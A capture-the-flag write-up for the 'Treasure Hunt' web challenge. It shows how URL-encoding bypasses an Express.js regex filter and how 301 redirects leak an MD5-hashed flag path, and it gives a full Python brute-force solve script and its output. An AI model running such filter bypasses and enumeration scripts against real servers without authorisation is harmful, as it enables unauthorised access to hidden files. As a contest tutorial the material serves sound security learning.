siunam's Website

My personal website

Home Writeups Research Blog Projects About

Treasure Hunt

Table of Contents

Overview

Background

Can you find a treasure?

Enumeration

Index page:

In here, we can go to different paths, such as /book:

Which is just a book emoji.

However, if we go to /alpaca, it says "Bad URL: /alpaca":

Hmm… Why is that? Let's read the source code of this web application and figure out why.

In this challenge, we can download a file:

┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:10:58(HKT)]
└> file treasure-hunt.tar.gz 
treasure-hunt.tar.gz: gzip compressed data, from Unix, original size modulo 2^32 51200
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:11:00(HKT)]
└> tar xvzf treasure-hunt.tar.gz 
treasure-hunt/
treasure-hunt/compose.yaml
treasure-hunt/web/
treasure-hunt/web/index.js
treasure-hunt/web/package.json
treasure-hunt/web/package-lock.json
treasure-hunt/web/Dockerfile
treasure-hunt/web/public/
treasure-hunt/web/public/key
[...]

After reading the source code, we can find that this is a very simple web application written in JavaScript with Express.js framework.

In web/Dockerfile, we can also see that the flag file is in a very weird path:

# Create flag.txt
RUN echo 'Alpaca{REDACTED}' > ./flag.txt

# Move flag.txt to $FLAG_PATH
RUN FLAG_PATH=./public/$(md5sum flag.txt | cut -c-32 | fold -w1 | paste -sd /)/f/l/a/g/./t/x/t \
    && mkdir -p $(dirname $FLAG_PATH) \
    && mv flag.txt $FLAG_PATH

Assume the flag's MD5 hash is 3876917cbd1b3db12e39587c66ac2891, the flag path is something like this:

./public/3/8/7/6/9/1/7/c/<snipped_md5_hash_path>/8/9/1/f/l/a/g/t/x/t

Hmm… So we'll need to brute force the flag's MD5 hash and get the correct path?

Anyway, why path /alpaca will return bad URL?

If we take a look at web/index.js, we can see that every requests must go through this middleware:

app.use((req, res, next) => {
  res.type("text");
  if (/[flag]/.test(req.url)) {
    res.status(400).send(`Bad URL: ${req.url}`);
    return;
  }
  next();
});

In here, if our request's URL path has character f, l, a, or g, it'll return HTTP status 400 with data Bad URL: <our_path>.

In the above case, path /alpaca has character a, which matched the regular expression pattern, thus returning bad URL.

Hmm… Wait, will req.url automatically perform URL decode? Maybe we can bypass it via URL encoding?

Let's log req.url and check it out!

app.use((req, res, next) => {
  console.log("[DEBUG] req.url", req.url);
  
  res.type("text");
  if (/[flag]/.test(req.url)) {
    res.status(400).send(`Bad URL: ${req.url}`);
    return;
  }
  next();
});
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:27:15(HKT)]
└> cd treasure-hunt 
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt/treasure-hunt)-[2024.12.01|15:27:15(HKT)]
└> docker compose up --build
[...]
Attaching to treasure-hunt-1
GET /%61%6c%70%61%63%61 HTTP/1.1
Host: localhost:3000


Response:

HTTP/1.1 200 OK
[...]

🦙

Log message:

treasure-hunt-1  | [DEBUG] req.url /%61%6c%70%61%63%61

Nope, it doesn't URL decode our path, and we successfully bypassed the filter!

Now, how can we brute force the flag's path?

After some trial and error, it seems like when the requested resource is a directory and missing a forward slash like /1, we'll be redirected to the correct path, such as /1/:

GET /3 HTTP/1.1
Host: localhost:3000


Response:

HTTP/1.1 301 Moved Permanently
[...]
Location: /3/
[...]

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Redirecting</title>
</head>
<body>
<pre>Redirecting to /3/</pre>
</body>
</html>

Exploitation

With that said, we can write a Python script to brute force the correct path and get the flag!

solve.py
#!/usr/bin/env python3
import http.client
from string import hexdigits

class Solver:
    def __init__(self, baseUrl):
        self.baseUrl = baseUrl
        self.connection = http.client.HTTPConnection(self.baseUrl.split('http://')[1])
        self.MD5_CHARACTER_SET = hexdigits
        self.MD5_HEX_LENGTH = 32

    def urlEncodeCharacter(character):
        return f'%{ord(character):x}'
    
    def bruteForceFlag(self):
        flagHash = str()
        finalPath = '/'
        while True:
            for character in self.MD5_CHARACTER_SET:
                if len(flagHash) == self.MD5_HEX_LENGTH:
                    print(f'\n[+] Got flag MD5 hash: {flagHash}')
                    return finalPath

                print(f'[*] Brute forcing character "{character}"', end='\r')
                encodedCharacter = Solver.urlEncodeCharacter(character)
                path = f'/{encodedCharacter}' if finalPath == '/' else f'{finalPath}/{encodedCharacter}'
                self.connection.request("GET", path)
                response = self.connection.getresponse()
                response.read()

                isCorrectCharacter = True if response.status == 301 else False
                if not isCorrectCharacter:
                    continue
                
                finalPath += f'{encodedCharacter}/'
                flagHash += character
                break

    def getFlag(self, flagHashPath):
        finalPath = flagHashPath
        for character in ['f', 'l', 'a', 'g', 't', 'x', 't']:
            encodedCharacter = Solver.urlEncodeCharacter(character)
            finalPath += f'{encodedCharacter}/'

        finalPath = finalPath.rstrip('/')
        print(f'[*] Getting the flag via path: {finalPath}')

        self.connection.request("GET", finalPath)
        response = self.connection.getresponse()
        data = response.read()
        flag = data.decode().strip()
        print(f'[+] Flag: {flag}')

    def solve(self):
        flagHashPath = self.bruteForceFlag()
        self.getFlag(flagHashPath)

if __name__ == '__main__':
    # baseUrl = 'http://localhost:3000' # for local testing
    baseUrl = 'http://34.170.146.252:19843'
    solver = Solver(baseUrl)

    solver.solve()
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|16:15:11(HKT)]
└> python3 solve.py
[*] Brute forcing character "f"
[+] Got flag MD5 hash: 4bafb19a7b66cb415eb070ce1a1b2e8f
[*] Getting the flag via path: /%34/%62/%61/%66/%62/%31/%39/%61/%37/%62/%36/%36/%63/%62/%34/%31/%35/%65/%62/%30/%37/%30/%63/%65/%31/%61/%31/%62/%32/%65/%38/%66/%66/%6c/%61/%67/%74/%78/%74
[+] Flag: Alpaca{alpacapacapacakoshitantan}

Conclusion

What we've learned:

  1. Regular expression bypass via URL encoding